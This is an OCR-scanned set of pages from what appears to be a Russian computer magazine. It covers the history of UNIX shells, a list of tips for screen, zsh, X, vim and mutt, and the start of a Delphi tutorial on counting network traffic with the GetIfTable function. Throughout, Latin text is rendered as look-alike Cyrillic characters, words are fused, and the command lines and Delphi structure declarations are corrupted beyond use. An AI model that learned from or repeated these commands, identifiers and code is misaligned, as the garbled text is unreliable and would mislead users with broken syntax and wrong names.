скриптовым языком и назвал его С зЬеІІ (сзИ). 

С зЬеІІ неунаследовал нововведений, сделан- 
ныхСтивеном Борном, потому какбазировался 
на коде командного интерпретатора шестой 
версии ІІКІІХ, который был хоть и расширенным, 
но все же шеллом Томпсона. Скриптовый язык 
сзЬ не уступает шеллу Борна по мощности, но 
отличается синтаксисом. Вто время как Борн 
скопировал все основные операторы с языка 
А1до168, Билл Джой использовал в качестве 
макета язык Си, вероятно, руководствуясь сво- 
ими предпочтениями и предпочтениями других 
пользователей В5й ЬІ N IX. 

Некоторым пользователям синтаксис С зЬеІІ 
может показаться более правильным и оче- 
видным, нежели синтаксис шелла Борна, но 
на самом деле это нетак. В начале 90-х С збеіі 
подвергся большой критике за свою двусмыс- 
ленность и немногословность интерпретатора, 
останавливающего выполнение скрипта, но 
не сообщающего никаких подробностей отом, 
что же все-таки произошло. Порой скрипты 
сзЬ работали совсем нетак, какэтого ожидал 



пользователь. Также встречались ситуации, 
когда интерпретатор отбраковывал, казалось 
бы, непротиворечивые строки кода. 

Но все-таки Биллу Джою нужно отдать должное. 
В сзЬ было сделано несколько нововведений, 
которые не только стали частью всех совре- 
менных командных интерпретаторов ІН N IX, но и 
вошли в стандарт Р05ІХ. Среди них: 

• расширение пути до домашнего каталога 
(символ «-»); 

• псевдонимы (команда аііаз); 

• управление заданиями (фоновое исполнение 
команды с помощьюуказания символа «&» 
после команды и встроенная команда рбз); 

• работа с историей (повторное выполнение ко- 
манды с помощьюуказания перед ней символа 
«!» и навигация по истории команд); 

• массивы; 

• математические операции. 

С зЬеІІ вошел в поставку 4.1 ВЗБ и до сих пор 
остается базовой частью всех ее потомков, в том 
числе РгееВББ и ОрепВББ. 

ОТЕЫЕХСБНеІІ 

Кэн Грир (Кеп бгеег), вдохновленный возмож- 
ностями командного интерпретатора операци- 
онной системы ТЕМ ЕХ, создал свою расширен- 
ную версию С збеіі и назвал ееТЕЫЕХС зЬеІІ 
(ісзЬ). Основной инновацией шелла стала одна 
из самых востребованных сегодня возможнос- 
тей — автодополнение путей и команд. Именно 
эта особенность сделала шелл ТЕІМЕХ таким при- 
влекательным и, какследствие, стала главной 
причиной его популярности. Несколько позднее 
в ісзб была добавлена другая не менее интерес- 
ная и востребованная возможность — редакти- 
рование командной строки. Теперь можно было 
стереть введенную строку, заменить в ней слова, 
переместить курсор в начало или конец строки 
(большинство современных командных интер- 
претаторов используют библиотеку геасШпедля 
выполнениятаких манипуляций). 

По мере развития ІсзН в него добавлялось все 
больше новых функций. Сегодняшняя версия это- 
го шелла обладает та ким и возможностями, как: 



• редактирование командной строки с поддер- 
жкой стилей ѵі и егласз; 

• программируемое автодополнение (шелл 
можно настроитьтак, чтобы по нажатию <ТаЬ> 
дополнялись нетолько имена команд и пути, 
но и, например, поддерживаемые командой 
флаги); 

• проверка правописания имен файлов, команд 
и переменных; 

• расширенный механизм навигации по катало- 
гам (команды ризГісІ, рорб, бігз); 

• периодические события (например, отло- 
женное во времени исполнение команды или 
«сброс» пользователя по истечении тайм-аута). 

• возможность указания в приглашении раз- 
личной полезной информации (текущий каталог, 
время, дата). 

Это лишь некоторые из функций ісвИ. По всем 
признакам это современный и удобный в 
использовании командный интерпретатор, 
развитие которого продолжается по сей день. 

ОКогпзНеІІ 

На ісзЬ история командных интерпретаторов с 
Си-подобным синтаксисом фактически закан- 
чивается, и мы возвращаемся к потомкам шелла 
Борна. В начале80-хДэвид Корн (Оаѵіб Когп), 
один из сотрудников Веіі Бабз, начал работу над 
командным интерпретатором, расширяющим 
возможности шелла Борна. По сложившейся 
традиции, новый шелл был назван в честьсозда- 
теля — Когп Ббеіі (кзЬ). 

В первую версию кзб вошло несколько из- 
менений, облегчающих создание скриптов, 
а также скопированные из сбЬ (по просьбам 
пользователей) функции работы с исто- 
рией. В шелле Корна впервые появилась 
возможность редактирования командной 
строки (стили егшасБ и ѵі), позже она была 
перенесена вісбЬ. Крометого, шелл Корна 
позволял использовать клавиши «вверх» и 
«вниз» для навигации по истории. Версия, 
выпущенная в 1986 году, обрела полную 
совместимость с мультибайтовыми коди- 
ровками. 
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>5Ье[[ (наиболее близ- 
кий аналог в русском 
языке — «оболочка») 

— программное обес- 
печение, создающее 
интерфейс между 
пользователем и опе- 
рационной системой. 
ЗЬеІІ может быть как 
текстовым (СУ, коман- 
дный интерпретатор), 
так и графическим 
(6111). К первомутипу 
можно отнести коман- 
дные интерпретаторы 
зЬ, ЬазЬ, 2 зЬ, второй 
составляют комплексы 
программ, обеспечи- 
вающих графическое 
окружение пользова- 
теля, такие как КОЕ, 
бпогше и ХРСЕ. 

>Для пользователя 
современных ЦІ N IX- 
подобных операцион- 
ных систем установка, 
удаление или замена 
командного интер- 
претатора — обычное 
дело. Нотакбыло не 
всегда. Шелл, испол- 
няемый как отдельный 
процесс, впервые 
появился в ОС МиШсз, 
предшественнице 
ЦІ N IX. В более ранних 
операционных сис- 
темах он был встроен 
в ядро. 




Версия кзЬ88 стала частью СІМІХ5узІетѴРе[еазе4и была 
одобрена для включения в стандарт Р05ІХ. В последнем 
релизе кзЬ, выпущенном в 1 993 году, появилась возможность 
изменения функций горячих клавиш, атакже множество до- 
полнений к скриптовому языку. В частности, интерпретатор 
кзЬ93 научился работатьсассоциативными массивами (хэш, 
втерминологии Регі), выполнять операции над числами 
с плавающейточкой, динамически загружать встроен- 
ные команды, работатьс«активными» и «смешанными» 
переменными (это придавало переменным некоторые черты 
«объектов»). Также в эту версию кзЬ была добавлена полно- 
стью совместимая со стандартом АЫ5І-С функция ргіпіТ. 
Оригинальная версия кзЬ до 2000 года оставаласьзакрытой, 
и поэтому появилось несколько совместимых командных 
интерпретаторов, распространяемых свободно. В их число 
вошли рсІкзЬ (РиЫіс Вотаіп Кот зЬеЩ, ЬазЬ и гзЬ. 

ОВоигпеадаіп зЬеІІ 

Войте адаіп зЬеІІ (ЬазЬ) — это командный интерпретатор, 
созданный Бранном Фоксом (Вгіап Еох) в рамках проекта 
6 N11. Вначале он позиционировался как свободная замена 
закрытому кзЬ, но позднее вырос в независимый продукт 
с несколькими оригинальными нововведениями. ВазЬ 
полностью совместим с шеллом Борна и стандартом Р05ІХ. 
Многие его возможности взяты из кзЬ и сзЬ. Редактирование 
командной строки, история команд, фоновое исполнение 
заданий, стек каталогов (команды ризЬб и рорб), подстанов- 
ка результата исполнения команды ('$(...)'), автодополнение 
имен команд и каталогов, встроенная поддержка арифмети- 
ческих операций ('((...))') — все это есть в ЬазЬ. 

Крометого, ЬазЬ обладает несколькими уникальными характе- 
ристиками, такими как, например, одновременное перенаправ- 
ление выходного потока и потока ошибок (&>), перенаправ- 
ление стандартного входа из строки (<<< 'строка'), открытие и 
закрытие файлов (ехесЗ <Ые; ехесЗ <&-) и работа с сокетами 
(ехесЗ<>/беѵЛср/\ллллл/.ЬозЕги/25; есЬо -е "НЕШЭ ѵѵѵѵѵѵ.туЬозі. 



ш" >&3). Втретью версию ЬазЬ были добавлены встроенный 
отладчикскриптов, возможностьсравнения с регулярным вы- 
ражением ([[строка =~ шаблон ]]) и новый вид замен (конструк- 
ция «{х.. у}» заменяется строкой из чисел отхдоу). 

ВазЬ — наиболее популярный командный интерпретатор 
на сегодняшний день. Он включен в стандартную поставку 
абсолютного большинства дистрибутивов Ыпих, а во многих 
из них выступает в качестве интерпретатора стартовых 
скриптов. 

□ ІзИеІІ 

«Перенесите большой и тяжелый кухонный комбайн, спо- 
собный заменить всю остальную бытовую технику на Вашей 
кухне, в мир командных интерпретаторов — и Вы получите 
2 зЬе[[» — с таких слов должна начинаться ѵѵеЬ-страница 
программы 2 зЬ . 

2 зЬе[[ (и5 Ь ) был написан в 1 990 году Полом Фолстадом (Раи [ 
Еа[зІаб) во время его учебы вуниверситете Принстона. Имя 
для командного интерпретатора он выбрал практически 
случайно, использовав логин 2 зЬ, которым пользовался 
ассистент его учителя 2Ьопд ОЬао для входа в операционную 
систему. 

Описать 2 зЬ, даже поверхностно, втаком маленьком обзоре 
невозможно. 2зЬ — это огромный «комбайн», которым можно 
заменить все остальные шеллы, представленные в этой статье. 
Он можетбыть подобен зЬ, сзЬ или ІсзЬ. Он можетбыть полно- 
стью совместим с ЬазЬ, а можетбыть не похожий на что. Можно 
применять 2 зЬ как[ф- или ігс-клиент, писатьсего помощью 
серверные программы, обрабатывающиезапросы клиентов, 
или вовсе незнатно его мощи и использовать какобычный 
командный интерпретатор. Позаложенному в программу по- 
тенциалу и многогранности областей применения 2 зЬ сравним 
разве что с редактором егшасз. 

Кроме эмуляции функциональности всех рассмотренных 
выше командных интерпретаторов, гзЬ также порадует поль- 
зователя такими возможностями, как: 

• очень гибкий механизм программируемыхавтодополнений 
(втеории, 2 зЬ можно научить дополнять по клавише <ТаЬ> 
все что угодно); 



ХРОНОЛОГИЯ РАЗВИТИЯ КОМАНДНЫХ 
ИНТЕРПРЕТАТОРОВ ІЖІХ 

ТЬотрзоп зЬе[[ (1 971 год, первая версия Б N IX, 
КепТЬотрзоп); 

Войте зЬеф или зЬ (1 977 год, Ѵегзіоп 7 Ы N IX, 

ОіерЬеп Войте); 

С зЬе[[, или сзЬ (1979 год, 4.1 ВОБ, ВІЕ боу); 

Тепех С зЬеф или ІісзЬ (1 979 , ВОБ Ы N IX, Кеп Огеег); 

Когп зЬе[[, или кзЬ (1 983 год, АТ &Т Ц) N IX, Оаѵіб Когп); 
Воигпе адаіп зЬеф или ЬазЬ (1987 год, Р05ІХ, Вгіап Еох); 
2 зЬе[[, или 2 зЬ (1990 год, РОЗІХ.РаиІРаІзІасІ); 

РгіепсІІу іпіегасііѵе зЬеІІ, или РізИ (2005 год, Р05ІХ, 

Ахе[ ЬфепсгапЫ. 



ОСОБЕННОСТИ ОБОЛОЧКИ А5Н 

Оболочка азЬ представляет собой одну из 
самых маленьких оболочек, доступных в *піх (за 
счет малых требований к памяти и дисковому 
пространству, по сравнению с другими зЬ- 
совместимыми оболочками). Этот командный 
интерпретатор имеет 24 встроенные команды 
и 1 0 различных опций командной строки. 
Обычно азЬ используется при загрузке Ыпих в 
однопользовательском режиме, в защищенном 
режиме или при загрузке дискетных версий 
Біпих. Также с ее помощью можно проверять 
скрипты на зЬ-совместимость. В МеШОй в 
качестве/Ьіп/зЬ работает именно азЬ. 
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• расширенные маски файлов ('*' и '?' — это лишь начальный уровень, по 
меркам 2 зЬ); 

• расширенные функции работы с переменными и массивами; 

• расширенный механизм редактирования командной строки [т . зИ 
использует собственный вариант геасШпе, названный 2 Іе, который делает 
редактирование строкболее гибким); 

• расширенный механизм настройки приглашения (гзЬ позволяет, напри- 
мер, поместить часть приглашения в правую сторону экрана); 

• единая история команд для всехзапущенныхэкземпляров гзЬ (можно 
быть уверенным, что история одного экземпляра 2 зЬ не перекроет исто- 
рию другого); 

• загружаемые модули, позволяющие расширять набор встроенных 
команд без модификации кода (например, модуль і ІИр для работы с прото- 
колом ІИр добавляет в набор одноименную команду); 

• чрезвычайно конфигурируемый, практически любой его параметр 
поддается настройке. 

Практически неограниченная мощьгзЬ одновременно является и его 
недостатком. Это оченьтрудный в освоении командный интерпретатор 
(имеется в виду освоение всех функций), полное описание которого зани- 
мает больше 300 страниц формата А4. 

□ РгіепсІІу іпіегасііѵе зИеІІ 

Описанные выше шеллы в большинстве своем достаточно сложны для 
освоения новичками и не могут быть отнесены к разряду дружелюбных к 
пользователю программ. РізЬ, созданный Ахеі Ыуепсгапіг (не возьмусь 
за перевод этого имени), выгодно отличается от них в этом отношении. 
Этот командный интерпретатор нетолько наиболее близок копределению 
«простой в использовании шелл», но и представляет несколько функций, 
интересных даже профессионалам. 

Хотя синтаксис скриптового языка бзЬ несколько отличается отсинтакси- 
са ЬазЬ и других шеллов, этот фа кт нас мало волнует. Наиболее «вкусные» 
его особенности связаны с интерактивным аспектом работы программы. 

В ІізН встроен расширенный механизм автодополнений, который печата- 
етнетолько возможные варианты дополнений, но и ихописание (набрав, 
например, «I», ты получишь на экранетаблицу, в которой будут перечисле- 
ны все команды, начинающиеся с «I», и краткое описание каждой из них). 
При возникновении ошибки ЛзЬ выводит не только полное ее описание, 
но и возможные пути ее решения. Кроме этого, ІізЬ подсвечиваетсинтак- 
сис своего скриптового языка прямо в окнетерминала. □С 
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- Системный администратор 

- Помощник сисадмина, 
техподдержка 

- Ваб програмист. 



ПИГІГІТР В#І гргЕШ 



ЗвонктоТ Тел ІШІ тш-ы-ш* 
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Сегодня в нашем меню: 
советы по X ѴѴіпсІсгѵѵ и КБЕ, 
несколько интересных тип- 
сов, посвященных исполь- 
зованию бессмертных Ѵіт 
и Мип, и пара хинтов по 
работе с излюбленным инс- 
трументом администрато- 
ра — зсгееп. Все ингредиен- 
ты тщательно отобраны и 
изысканно приготовлены. 
Угощайся. 



ВБсгееп 

Отключаем приветствие: 
з0аг1сир_теззаде оіі 

Настраиваем статусную строку (время дата 
юзер:хост[ открытые окна ]]: 
сарііоп зріііопіу " %{ѵіЬ} % = %п %Р " 
ЬагЬзДаДиз Іазіііпе "%{+Ьѵтк} %с 
%Б %Ь %М %У %= [ ] " 

Вешаем на клавиши запуск программ (нажи- 
мать следует в сочетании с <СігІ>): 

Ьіпсі ' сд ' зсгееп шс 
Ьіпсі ' Ѵ7' зсгееп ши ДО 
Ьіпсі ' е' зсгееп еііпкз 

Клавиши <Р1 > и <Р2> для навигации по 
окнам: 

ЬіпЬкеу -к Р1 ргеѵ 
ЬіпЬкеу -к Р2 пехР 



ОБИеІІ 

Модификаторы имен файлов в 25Н (пример: 
5ТРІМ6="а/Ь/с"; есЬо "$5ТРІМ6:модифика- 
тор"): 

: Ь - начальный каталог (аналог команды 
сіігпате); 

: ь - имя файла (аналог команды Ьазепате); 
: е- расширение; 

: г - удалить расширение; 

: 1 - конвертировать в строчные буквы; 

:и - конвертировать в прописные буквы. 



пЧгіскз 



г Л 

ОХѴѴіпсІоѵѵ 

Включить поддержку колесика мыши (доба- 
вить в секцию ІприШеѵісе файла /еіс/Х1 1/ 
хогд.сопЯ: 

ОрРіоп "2АхізМарріпд" "4 5" 

Разрешить запускХ-сервера без мыши 
(добавить в секцию ЗегѵегРІадз): 

ОрДіоп " АІІоѵтМоизеОрепРаіІ " " Ргие" 

Копирование и вставка из командной строки: 

$ саД іііе I хсіір 
$ хсіір -о 

Циклическое переключение разрешения 
экрана: 

СІГІ+АІЦ+ ' + ' 

СІГІ+АЮ+ ' - 1 

Х-сервер в окнеХ-сервера: 

$ Хпезі -ас -деошеігу 1024x7 68 : 1 & 

Сетевой доступ кХ-серверу (1 92.1 68.3.3 
— Х-клиент, на нем исполняются програм- 
мы; 192.168.3.1 — Х-сервер, отрисовывает 
картинку): 

Открываем доступ: 

[зегѵег]# хЬозД +192.168.3.3 
[с1іепі]$ ехрогР 
ЫЗРЬАУ=192 . 168 . 3 . 1 : 0 . 0 

Второй графический сеанс на локальной 
машине: 

$ зОагОх -- : 1 

Виртуальные файловые системы Копдиегог: 
аисііоссі: / — аудио Сй; 
іізЬ : / — 55Н ; 
іір : / — РТР; 

ЬДОр: / - НТТР; 
ішар : / - I МАР; 
іпіо : / — страницы і піо ; 

ІЬар: / — каталоги ЮАР; 

шап: / — тап-страницы; 

ппір : / — МКІТР; 

рорЗ : / — РОРЗ; 

ргіпо : / — система печати; 

гарір : / — подключение к КПК; 

ЗІЦр : / — 5 РТР ; 

зір : / — Зегѵісе І_осаіог Ргоіосоі; 
зшЬ : / — 5МВ (ЗатЬа); 
ззЬ: / — 55Н (запускается Копзоіе); 
ѵпс : / — диалог подключения кѴЫС. 



юниксоида 



ТРЮКИ И СОВЕТЫ ЮНИКСОИДУ 



ОМіШітесІіа 

Запись интернет-радио: 

$ шріауег ЬДДр : / /шт. ЬозД . ги : 812 8 
-ЬишрзДгеаш -Ьишріііе шизіс.шрЗ 
-ѵс Ьиішпу -ѵо пиіі. 

О Ѵіт 

Убираем из окна дѵіт все ненужное (вроде 
панели инструментов) и включаем меню, 
вызываемое нажатием второй кнопки мыши: 

: зеД диіорОіопз = асшдгЬ 
: зеі шоизетосіе1=рорир 

Включаем «фолдинг» (все строки, находящи- 
еся между «{{{» и «}}}», будут автоматически 
свернуты): 

: зеі іо1<±тіеТЬосі=тагкег 
: зеі іо1сітагкег= {{{,}}> 

Просмотр содержимого Ир-ресурса: 

$ ѵіт Юр : / / Юр@ЬозЦ . ги/риЬ 

Редактировать файл по протоколу вер: 

$ ѵіт зер : / / изег@ЬозЦ . ги/ . ѵітге 

Редактировать файл по протоколу зЬр: 

$ ѵіт з Юр :/ /изег@Ьозі . ги/ . ѵітге 



ОМиН 

Учим пгиЖ показывать появление новых 
писем в ящике флагом ' N ' : 
таіІЬохез 'есЬо ~/Маі1/*' 

Используем различные методы сортировки 
для разных ящиков (содержимое ящика 
ІпЬох сортируется по датам, всех остальных 
— потредам): 

Іоісіег-Ьоок . ’ зеі зогЦ=ЦЬгеасіз 1 
іоІЬег-Ьоок ІпЬох 1 зеі зогР=с1а1се- 
гесеіѵеЬ’ ШП 



/ 114 
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ТЕРЯЙСЯ :), 



^ согііпд 



КОПИЯ ПРОГРАММЫ, 
НАПИСАНИЕ КОТОРОЙ 
МЫ РАССМОТРИМ В ЭТОЙ 
СТАТЬЕ, МОЖЕТ СТОИТЬ 
ДО 20 ДОЛЛАРОВ (НАПРИ- 
МЕР, ООМЕТЕК). ПОЭТОМУ 
ВПИТЫВАЙ ЗНАНИЯ И НЕ 



ИГОРЬ «ЗРЮЕП ЫЕТ » АНТОНОВ 



/ ЗРІОЕВ ЫЕТ@ШВОХ.П1І 



СТРОГИЙ НАДЗОР 
ЗА ТРАФИКОМ 



СТРОИМ СВОЙ ИНСПЕКТОР ИЗ ДОСТУПНЫХ МАТЕРИАЛОВ 



Во времена сумасшедшего использования таких технологий, как СРКЗ/ЕБСЕ, БЗЬ, при- 
ходится всерьез задумываться о потраченном трафике. Цены на него, конечно, падают, 
но и потребности наши возрастают. Если пытаться запомнить, сколько ты скачал вчера, 
а сколько — сегодня, то можно начинать собираться в психушку, поскольку от таких рас- 
четов мозг, скорее всего, сильно заглючит. Чтобы этого не случилось, мы покажем тебе, 
как можно автоматизировать процесс подсчета трафика. 



□ Обзор инструментария 

Поскольку наша программа будет иметь графи- 
ческий интерфейс, то и писать ее лучше всего 
на ОеІрЬІ. Версия любимой среды разработки 
значения не имеет. Помимо ОеІрЫ, нам потре- 
буется доступ в инетдля заглядывания в М50Ы, 
а если ты не в ладах с английским языком, то не 
забудь обзавестись англ о- русским словарем, 
поскольку всю информацию М іеговой приводит 
на языке посетителей порносайтов. 

□ Теоретическая часть 

Перед рассмотрением практического при- 
мера, необходимо ознакомиться стеорией, 



поэтому отложи клаву подальше и приготовься 
к впитыванию инфы. Получить информацию о 
трафике можно несколькими способами. Мы 
воспользуемся самым продвинутым — функци- 
ей ОеіІГГаЫе из библиотеки ІРНІ_РАРШІ_І_ 

(в модулях, идущих вместе с ОеІрЫ, ее описа- 
ния нет). Эта функция позволяет с легкостью 
получить информацию отрафике и сетевых 
интерфейсах. Работать с ней очень просто, 
а библиотека, помимо нее, содержитеще 
массу функций для получения всевозможной 
информации о работе сети и т.д. Эта библиоте- 
ка существует и в ѴѴІпсІоѵѵв 9х, и в ее последних 
версиях (2К/ХР/2КЗ/Ѵів1:а), где она отличается 



появлением новых функций (изменение струк- 
тур). Чтобы не волноваться за работоспособ- 
ность своей программы, советую обратиться 
к М50Ы и сделать в коде проверку версии 
ѴѴі псіоѵѵз. В своем примере я буду ориентиро- 
ваться на все еще самую популярную в народе 
ѴѴІ ПСІ0ѴѴ5 ХР. 

Итак, как я уже сказал, модуль, в котором 
были бы описаны структуры и функции 
этой библиотеки, вместе с ОеІрЬІ не идет, 
поэтому нам в своем проекте придется их 
описывать самостоятельно. Первым делом 
давай рассмотрим функцию, которая нам 
понадобится : 



/ ііб 
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>Великий МБРМ 



бипсбісщ СеНЙаЫе( 
рІбТаЫе : РМІВ_ІЕТАВБЕ; 

рсбл/8 і 2 е : РШГОШ; 

ЪОгсіег : ВООЬ ; 

) : БѴГОКБ; 



рІГГаЫе — указатель на структуру М I В_ 
ІЕТАЕНЕ, рѵѵсІБіге — буфер для получения 



Структуру МІВ таблицы нам также придется 
объявлять самим. 

КОД СТРУКТУРЫ 

ТМіЫбКоъ/ = раскесі гесогсі 
ѵ\/з гЫаше : аггау [ 0 . . 2 5 5 ] об ШсІеСЪаг ; 
ск\/Іпс1ех : БѴГОКБ; 

СІѵбГуре : БѴГОКБ ; 



«МЫ ВОСПОЛЬЗУЕМСЯ САМЫМ 
ПРОДВИНУТЫМ — ФУНКЦИЕЙ 
ОЕТІРТАВЬЕ ИЗ БИБЛИОТЕКИ 
ІРНЬРАРІ.ОИ (В МОДУЛЯХ, ИДУ- 
ЩИХ ВМЕСТЕ С ОЕЬРНІ, ЕЕ ОПИ- 
САНИЯ НЕТ)» 



данныхтаблицы М I В_І РТАВ ЬЕ, ЬОгсіег — сор- 
тировка. При успешном выполнении функция 
возвращает Ы0_ЕРР0Р, в противном случае 
— код ошибки. После выполнения функции все 
данные запишутся в структуру ркТаЫе, указа- 
тель которой передается в первом параметре. 
Структура М I В_І Р_ТАВ ЬЕ выглядит следующим 
образом: 

ТМіЫбТаЫе = раскесі гесогсі 
(ітл/БитЕпбгіез : БѴГОКБ; 

ТаЫе : ТМіЫбАггау; 

епсі; 

сіѵѵМитЕпІгіез — количество сетевых интер- 
фейсов, ІаЫе — массив структур МІВ_ІЕ_ПОѴѴ. 
Послеуспешного выполнения в бѵѵЫиппЕпІгіев 
будет содержаться количество сетевых интер- 
фейсов. Пробежавшись по ним в цикле, мы смо- 
жем получить всю необходимую нам информа- 
цию. Информация о каждом интерфейсе будет 
храниться в соответствующей МІВ-таблице. 



сІмМби : БѴГОКБ ; 
сІѵГОреесІ : БѴГОКБ ; 

<ІѴ\/РЪ.узАс1с1гБеп : БѴГОКБ; 

ЪРЬузАсМг : аггау [0.. 7] об Вубе; 
сіъ/АсітіпЗбабиз : БѴГОКБ; 
сІѵГОрегЗбабиз : БѴГОКБ; 
сІжБазбСкапде : БѴГОКБ; 

<±л/Іп0сбебз : БѴГОКБ; 
сімІпБсазбРкбз : БѴГОКБ; 
СІѴ/ІпШСазбРкбз : БѴГОКБ; 
сІмІпБізсагсІз : БѴГОКБ; 
ск\/ІпЕггогз : БѴГОКБ; 
сіѵ^ІпБпкпоѵтРгобоз : БѴГОКБ; 
СІѵГОибОсбебз : БѴГОКБ; 
(ІѵГОибБСазбРкбз : БѴГОКБ; 
сіШибШСазбРкбз : БѴГОКБ; 
сіѵГОибБізсагсІз : БѴГОКБ; 
скГОибЕггогз : БѴГОКБ; 
с!ѵ\ГОибС>Беп : БѴГОКБ; 
скл/БезсгБеп : БѴГОКБ; 

ЬБезсг : аггау [0 . .255] об Скаж- 
ет!; 
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! ГКГІІТ^ I чыѴнн» ІК | 



і_Э 



0 ■ Интерфейс 

1 Т ічі і#-г«?рфейсэ 

2 ■ МАИ адрес 

Э - Скроаггь 

4 Отправлено 

5 ПржяЯа 
Ё Ем«0ш 
7- ЕпогІМ 



> Создаем колонки в ЫзІѴіеѵѵ 

Не пугайся такого большого количества свойств :), 
сейчас я поясню, что они собой представляют: 
ѵѵзгМате — имя сетевого интерфейса. В пос- 
ледних версиях ѴѴіпбоѵѵз это свойство заменяет 
Аііаз. сіѵѵіпсіех — порядковый номер соответс- 
твующего интерфейса. сіѵѵТуре — тип интерфей- 
са. Может быть: 

• ІР_ТѴРЕ_ОТНЕР (1) — неизвестный сетевой 
интерфейс; 

• ІР_ТѴРЕ_ЕТНЕРЫЕТ_С5МАС0 16) - ЕіЬегпеІ; 

• ІР_ТѴРЕ_І5088025_ТОКЕМРІЫ6 (9) - Токеп 
гіпд ; 

• I Р_ТѴРЕ_РРР (23 ) — РРР; 

• ІР_ТѴРЕ_50РТѴѴАРЕ_І_00РВАСК(24) — 

ІоокЬаск; 

• ІР_ТѴРЕ_АТМ (37) — АТМ; 

• ІР_ТѴРЕ_ІЕЕЕ8021 1 -ІЕЕЕ 802.11; 

• ІР_ТѴРЕ_ТиММЕИ131) — Іиппеі; 

• I Р ТѴРЕ ІЕЕЕ 1 394 (144) - ІЕЕЕ 1394. 

сіѵ/МТІІ - м аксимальная скорость передачи. 
сІѵѵБреесІ — скорость передачи данных 
(биты/сек). сІѵѵРЬу5АсісігІ_еп — длина физичес- 
кого адреса устройства. ЬРЬузАсИг-ф изи- 
ческий адрес интерфейса. сіѵѵАсітіпБіаІиз 

— активность интерфейса. Описание 
принимаемых значений смотри в М50ІЧ. 
сІѵѵОрегБіаІиз — текущий статус интерфейса. 
Опять же может принимать множество значе- 
ний, поэтому, чтобы не тратить место в статье, 
снова направляю тебя кМБйМ. сіѵѵІ_а5*СНапде 

— последний измененный статус. сіѵѵІпОсІеІз 

— количество байт, принятых через опреде- 
ленный интерфейс. сІѵѵІпІІсазІРкІз — ко- 
личество направленных пакетов, принятых 
интерфейсом. сІѵѵІпМІІСазІРкІз — количество 
ненаправленных пакетов, принятых интер- 
фейсом. сіѵѵІпОізсагсіз — количество входящих 
забракованных пакетов. сіѵѵіпЕггогз — ко- 
личество принятых пакетов, содержащих 
ошибки. сІѵѵІпІІпкпоѵѵпРгоІоз — количество 
принятых забракованных пакетов с неизвес- 
тным протоколом. сіѵѵОиЮсІеІз — количество 
байт, отправленных через определенный ин- 
терфейс. сіѵѵОиШСазІРкІз — противоположно 
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> Немного кода — и прога готова 



ПОЛЕЗНЫЕ РЕСУРСЫ 

тзсІп.тісгоБоГЕсот — легендарный 
МБОЫ; 

ѵг-опііпе.ги — новости, статьи, журналы, 
форум; 

Гоггу.пеГ — самый большой архив ком- 
понент для ОеІрЫ. Здесь можно найти 
уже готовые компоненты для подсчета 
трафика. 



сЫпІІсавіРкіБ. сіѵѵОиНЧІІСазІРкІз — противо- 
положно сМпЫІЮавіРкІБ. сіѵѵОиЮізсагсІБ — 
противоположно бѵѵІпРІБсагсІБ. сІѵѵОиІЕггогз 

— противоположно сіѵѵіпЕггогб. сІѵѵОиШБеп 

— длина очереди данных. сІѵѵОезсгІ-еп — раз- 
мер ЬРеБсг. ЬОезсг — описание интерфейса. 
Более полное описание этой структуры ты 
найдешь в М5БКІ. 

□ Пример использования 

Теперь, когда мы владеем всей необходимой 
информацией, самое время написать пример- 



чик. Запускай БеІрЬі, создавай новый проект 
типа АррІісаГоп и кидай на форму тай мер и 
ЕізГѴіеѵѵ. Создай в нем 8 столбцов: 

1. Интерфейс 

2 . Тип интерфейса 

3. Физический адрес 

4 . Скорость 

5 . Отправлено 

6. Принято 

7. ЕггогОиі 

8. Еггогіп 

В ЕізГѴіеѵѵ мы будем отображать всю получен- 
ную информацию, поэтому нужно придать ему 
соответствующий вид. Выстави следующие 
свойства: 

СгісІЬіпез = Огие 



НоДТгаск = Дгие 
КсжЗеІесО = Дгие 
ѴіемЗДуІе = ѵзКерогЪ 

Пример моей формы ты можешь увидеть на 
рисунке. Форма готова, можно переходить 
к кодингу. Придвинь к себе клавиатуру и 
первым делом опиши в модуле проекта все 
структуры, которые мы разбирали: МІЫГПоѵѵ, 
МіЫГГаЫе. Помимоэтого, объяви новыйтип 
ТМасАббге55=аггау[1 ..8] и ТМІЫіАггау=аггау[0 
..512] о Г ТМІЫГПоѵѵ. В ТМасАсМгезБ мы будем 



хранить физический адресустройства. Для 
всех созданных структур сделай указатель. 
Когда опишешь все структуры, не забудь объ- 
явить нашу функцию. Делается это следующим 
образом. После раздела ѵаг модуля нашей 
формы напиши: 

ГипсСіоп СеОІГТаЪІе (рІГТаЪІе : 
РМіЫГТаЫе; рВмЗіге: РІІЬОШ; 

ЬОгсІег : Ьооіеап) : БШКБ; 
зБсІСаІІ; ехСегпа! 1 ІРНБРАРІ . 

БББ ' ; 

Если ты работал с библиотеками ВЕБ, то тебе 
должно быть все понятно, в противном случае 
знай, что таким образом можно обращаться к 
функциям, которые находятся в ОБЕ. Создай 



обработчиксобытия ОпТітегдля нашего тай- 
мера и напиши в нем код из соответствующей 
врезки, а я объясню, что в нем происходит. 
Перед использованием ѲеШТаЫе нужно 
выделить необходимую память под структуру 
МіЫГГаЫе. Память выделяется с помощью 
Меѵѵ. Все, память выделили, а значит, можно 
попытаться вызвать функцию ѲеГІГТаЫе. 
Результат ее выполнения запишется в пере- 
менную _еггог. Теперь проверь значение этой 
переменной. Если оно не равно І\Ю_ЕПП0П, 
то это означает, что тебя посетила птица обло- 
минго и нужно показать печальное сообщение, 
прервать выполнение процедуры и сверить 
свой код с листингом. Если же все нормально, 
то в цикле можно начинать разбирать наши 
данные. 

Как я уже говорил, в сІѵѵКІитЕпІтіеБ структуры 
ТМІЫГТаЫе хранится количество интерфейсов. 
Запускаем цикл отО до сІ\л/МитЕЫгіе5-1 и 
начинаем радоваться полученной информа- 
ции. При добавлении в ЕізіѴіеѵѵя использую 
функциидля преобразования полученных 
данных. Зачем? Отвечаю. Например, значение 
бѵѵОиЮсГеІБ приводится в байтах. Не думаю, 
что в программе учета трафика будетудобно 
смотреть на большое количество постоянно 
меняющихся цифр. Поэтому можно реализо- 
вать отображение трафика в привычных нам 
единицах: Кб, Мб, Гб. Чтобы решить эту задачу, 
я создал функцию, которая будет высчитывать 
трафик в определенных единицах измерения 
информации. Код приводить не буду — если 
ты немного знаком с ОеІрГіі, то проблем с на- 
писанием подобного кода утебя не возникнет. 
Подобную же функцию я создал для определе- 
ния скорости соединения. В моем проекте она 
называется 5реебТо51г(). Ее код идентичен 
функции ТгаГГ, изменены только константы, в 
которых хранятся значения каждой единицы 
измерения скорости (Ьрз, КЬрз, МЬрз). 

В самом начале статьи я рассказывал тебе про 



